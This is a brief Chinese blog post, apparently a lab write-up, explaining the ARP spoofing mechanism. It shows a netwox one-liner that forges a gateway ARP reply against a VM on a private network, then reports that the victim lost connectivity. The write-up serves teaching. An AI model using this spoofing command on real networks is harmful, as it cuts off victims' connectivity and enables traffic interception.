zoukankan      html  css  js  c++  java
  • arp欺骗

    arp欺骗原理

    某机器A要向主机B发送报文,会查询本地的ARP缓存表,找到BIP地址对应的MAC地址后,就会进行数据传输。如果未找到,则广播A一个ARP请求报文(携带主机AIP地址Ia——物理地址Pa),请求IP地址为Ib的主机B回答物理地址Pb。网上所有主机包括B都收到ARP请求,但只有主机B识别自己的IP地址,于是向A主机发回一个ARP响应报文。其中就包含有BMAC地址,A接收到B的应答后,就会更新本地的ARP缓存。接着使用这个MAC地址发送数据(由网卡附加MAC地址)。因此,本地高速缓存的这个ARP表是本地网络流通的基础,而且这个缓存是动态的。

    我们冒充网关发送一条arp应答报文,让被攻击者对本地的arp缓存进行更新,将应答报文中的IP地址和mac地址存入arp缓存表

    a:攻击机 主机mac:00:0c:29:e5:28:c8

    b:受机 网关ip:192.168.206.2 主机ip:192.168.206.129 主机mac:00:0c:29:6d:45:29

    攻击语句:

    netwox 80 -e "00:0c:29:e5:28:c8" -i "192.168.206.2" -E "00:0c:29:6d:45:29" -I "192.168.206.129"

    攻击结果:

    b无法联网

    b的网关被修改 网关mac:00:0c:29:e5:28:c8 网关ip:192.168.206.2

  • 相关阅读:
    2.22
    LG P7077 函数调用
    2020/10/30 模拟赛 序列
    2020/10/27 模拟赛 数列
    2020/10/23 模拟赛 chip
    2020/10/23 模拟赛 escape
    2020/10/23 模拟赛 center
    LOJ#6581. 「ICPC World Finals 2019」断头路探测者
    LG P1587 [NOI2016]循环之美
    LG P4156 [WC2016]论战捆竹竿
  • 原文地址:https://www.cnblogs.com/ailx10/p/5536037.html
Copyright © 2011-2022 走看看